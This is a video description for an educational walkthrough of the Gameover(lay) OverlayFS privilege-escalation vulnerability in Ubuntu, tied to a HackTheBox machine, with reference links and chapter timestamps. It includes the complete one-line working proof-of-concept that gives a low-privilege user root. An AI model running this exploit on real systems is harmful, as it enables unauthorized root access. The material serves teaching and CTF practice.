Gameover(lay) Exploit Explained
The Gameover(lay) (CVE-2023-2640 / CVE-2023-32629) vulnerability was a big deal in late July 2023. The POC is super short, and yet complex. We'll walk through the lines one by one, and understand what it's doing and how it provides a low privilege user root access by abusing the OverlayFS and how it manages file attributes (like capabilities) when syncing between upper and lower.
Exploit: unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; id")'
HackTheBox Analytics Blog post: https://0xdf.gitlab.io/2024/03/23/htb...
HackTheBox Analytics: https://www.hackthebox.com/machines/a...
OverlayFS explained post from Julia Evans: https://jvns.ca/blog/2019/11/18/how-c...
Exploit Tweet from @liadeliyahu: / 1684841527959273472
CVE-2023-2640: https://www.cvedetails.com/cve/CVE-20...
CVE-2023-32629: https://www.cvedetails.com/cve/CVE-20...
☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf
[00:00] Introduction
[00:47] Show exploit
[01:23] unshare / namespaces
[02:54] Setup files within namespace
[04:39] mount OverlayFS
[05:56] Using touch to get files into upper
[06:20] Exit namespace and escalate
[07:36] Revisiting exploit
[08:41] Conclusion
#pentest #ctf #bugbounty #gameoverlay #linux #privesc
Смотрите видео Gameover(lay) Exploit Explained онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь 0xdf 14 Март 2024, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 745 раз и оно понравилось 47 людям.